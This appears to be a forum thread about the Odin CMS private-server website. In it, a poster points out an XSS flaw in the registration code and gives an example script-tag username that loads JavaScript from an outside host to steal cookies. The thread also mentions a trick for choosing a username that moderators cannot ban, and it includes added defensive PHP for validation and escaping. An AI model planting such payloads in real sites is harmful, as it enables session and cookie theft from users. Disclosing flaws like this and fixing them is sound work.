Don't use it anymore.
Dev thread: https://forum.ragezone.com/f331/odin-cms-mysqli-raintpl-oop-1063274/
Maybe you can share the database too?
I bet there are exploits lol
Code:
<?php
$first_name = (isset($_POST["username"]) ? $core->Filter($_POST["username"]) : null);
// Here it just filters the username, so blabla"blabla will become blabla\"blabla; nothing wrong with that, but you can still pick this name.
if (is_null($first_name))
{
    $registerErrors[] = "You must enter a username.";
}
// Just checks if it's null, nothing wrong with it.
$full_name = $first_name;
if (!$users->CheckUsername($full_name))
{
    $registerErrors[] = "That username is unavailable.";
}
// Here it checks if the same username already exists; there's no check whatsoever on which characters you can use.
// You can just fill in <script src="http://whateverwebsite.com/blabla.js"></script> and steal some cookies!
I've looked at the source; it looks like you have quite a lot of XSS vulnerabilities.
You can also pick a username with the skull altcode, so nobody can ban or target you whatsoever.
If I'm wrong, just tell me, but it looks like there are a lot of XSS exploits one can use; this is just one example.
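The fix the post is pointing at is an allow-list on the username at registration plus escaping on output, rather than only backslash-escaping quotes. The snippet below is an added illustration, not Odin CMS code; the function names, the 3-20 character `[A-Za-z0-9_]` rule and the sample inputs (including the placeholder host) are my own assumptions.

```php
<?php
// Added example, not part of Odin CMS: allow-list validation for usernames
// and HTML escaping on output. Names and limits here are assumptions.

/**
 * Returns null when $username is acceptable, otherwise an error message.
 * Allow-list: 3-20 ASCII letters, digits or underscores. This rejects both
 * markup such as <script src=...> and non-ASCII characters that a moderator
 * cannot type (the "skull altcode" case mentioned in the thread).
 */
function validateUsername(?string $username): ?string
{
    if ($username === null || $username === '') {
        return 'You must enter a username.';
    }
    if (!preg_match('/^[A-Za-z0-9_]{3,20}$/', $username)) {
        return 'Usernames may only contain 3-20 letters, digits or underscores.';
    }
    return null;
}

/** Escape a value for insertion into HTML text or a quoted attribute. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// How it slots into a registration handler (mirrors the $registerErrors pattern).
$registerErrors = [];
$first_name = $_POST['username'] ?? null;
if (($err = validateUsername($first_name)) !== null) {
    $registerErrors[] = $err;
}

// Constructed sample inputs for an offline run (example.invalid is a placeholder).
$samples = [
    'Jonteh',
    'bla"bla',
    '<script src="http://example.invalid/x.js"></script>',
    "\u{2620}",   // U+2620 SKULL AND CROSSBONES
];

foreach ($samples as $name) {
    $error = validateUsername($name);
    // Even a rejected name is escaped before being echoed back in the error page.
    printf("%-55s => %s\n", h($name), $error ?? 'ok');
}
```

Only the first sample passes; the other three are rejected, and the script tag is rendered inert by `h()` when echoed back.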
Ahh, you released it. Awesome release, man. :8:
I found it funny how people take credit for the CSS and design etc., when I was the one who originally coded this.
noobs will be noobs - aka you
@Jonteh why, when I connect to the HK and log in, does it say incorrect login?
I looked at hk_fuses.
Most likely an incorrect rank. Check the hk_fuses table.